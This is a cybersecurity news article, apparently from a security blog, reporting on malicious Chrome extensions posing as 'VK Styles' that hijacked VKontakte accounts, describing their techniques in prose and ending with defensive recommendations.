Chrome Extension Posing as “VK Styles” Infects 500,000 Users, Hijacks VKontakte Accounts in Widespread Malware Campaign

CyberDefender 8 mins0

In early February 2026, cybersecurity researchers uncovered a sophisticated malware campaign that quietly hijacked over 500,000 accounts on VKontakte (VK) — one of the largest social networks in Russia and surrounding regions. The culprit? A set of malicious Google Chrome extensions masquerading as harmless theme-and-style tools designed to enhance the VK user experience.

But beneath friendly names and thousands of installs lay a malicious operation capable of persistent account manipulation, covert data operations, and self-propagation. This isn’t your average ad injector — it’s a software supply chain attack embedded in browser extensions.

What Laid Behind the Illusion

At first glance, extensions like VK Styles – Themes for vk.com looked innocuous and helpful. They offered UI customizations, promised better visuals, and had positive reviews — all traits that helped them remain under the radar of casual users and automated scanners.

But a deeper analysis revealed multi-stage malicious behavior:

  • Dynamic payload loading through legitimate infrastructure (VK profiles and GitHub).
  • CSRF token manipulation to bypass VK’s protections.
  • Automated forced actions, such as subscribing users to attacker-controlled VK groups.
  • Periodic resetting of user settings to maintain control.
  • Monetization hooks leveraging VK’s own APIs.

What made this campaign especially clever was how malware was delivered and updated: instead of hardcoding malicious payloads directly in extension code, the extension fetched and used dynamic URLs hidden in the metadata of a VK profile. That profile effectively became the command and control (C2) infrastructure — hosted on VK itself.

A Technical Breakdown

Here’s how the malicious operation worked from a technical perspective:

Stage 1: Obfuscated Code and Dynamic Payloads

A routine scan flagged a Chrome extension injecting Yandex advertising code into all webpages. This unusual artifact triggered deeper inspection. What the researchers found was an innocuous-looking extension that, when installed, pulled executing code from a hidden location in a VK profile’s HTML metadata.

Instead of embedding payload URLs in the extension source, metadata tags contained encrypted directives pointing to:

  • a GitHub repository
  • a Yandex metrics / analytics URL
  • a third URL providing bundled scripts

This mechanism made static detection far less effective and showed advanced evasion techniques that avoid hardcoded indicators.

Stage 2: Malicious Behavior After Activation

Once activated and running, the malware carried out several persistent actions:

Automatic Group Subscription

Every time the infected user visited VK, the extension had a 75% chance of forcing the victim’s account to auto-subscribe to an attacker-controlled group.

This built a self-propagating infection vector—more subscriptions lead to higher visibility and social proof, further attracting new victims.

Settings Reset

The malware reset core VK settings every 30 days, overriding personal preferences and preventing users from escaping its effects without removing the extension entirely.

CSRF Token Manipulation

By tampering with VK’s Cross-Site Request Forgery (CSRF) protection cookies, the malware could perform unauthorized actions on behalf of the user — such as manipulating subscriptions or modifying settings — without triggering security protections normally enforced by the platform.

Monetization & Feature Gating

The attacker also tracked payment statuses via VK’s “Donut” API — a feature that usually handles “supported creator” contributions — allowing the malware to gate features and potentially extract monetization.

Scope & Campaign Structure

Analysis by Koi Security found five distinct Chrome extensions linked to the same actor and infrastructure, totaling over 502,000 confirmed installations before Google removed the most popular one from the Chrome Web Store.

Regions affected included primarily Russian-speaking communities, Eastern Europe, Central Asia, and broader diaspora networks — effectively leveraging VK’s popularity to spread the malware.

What This Means for Browser Security

This campaign illustrates major trends in modern malware distribution:

Extensions as an Attack Vector

Browser extensions run with high privilege and update automatically — making them prime targets for attackers. Prior research shows malicious extensions have been used for data exfiltration, click fraud, and account hijacking in many contexts.

Dynamic & Decentralized C2 Infrastructure

Using legitimate services like VK profiles and GitHub to host payload definitions and control endpoints makes detection much harder. Static scanning can no longer be the only defense.

Social Platforms as Malware Infrastructure

Embedding C2 in a social network profile isn’t just clever — it also circumvents typical domain-based blocking and reputation checks.

Mitigations & Best Practices

To defend against similar threats:

  • Limit extension privileges and audit them regularly.
  • Use enterprise extension whitelisting and behavioral monitoring.
  • Employ sandboxing and network analysis for client tools.
  • Educate users about risks of third-party extensions, even if they appear legitimate.

Always assume browser extensions are powerful — and in the wrong hands, dangerous.

Final Takeaway

The VK Styles malware campaign represents a new level of malicious browser extension exploitation — blending dynamic delivery, social infrastructure abuse, and persistent account manipulation. As the browser ecosystem continues to expand, so too will the sophistication of attacks. Security teams and users must stay vigilant.

CyberDefender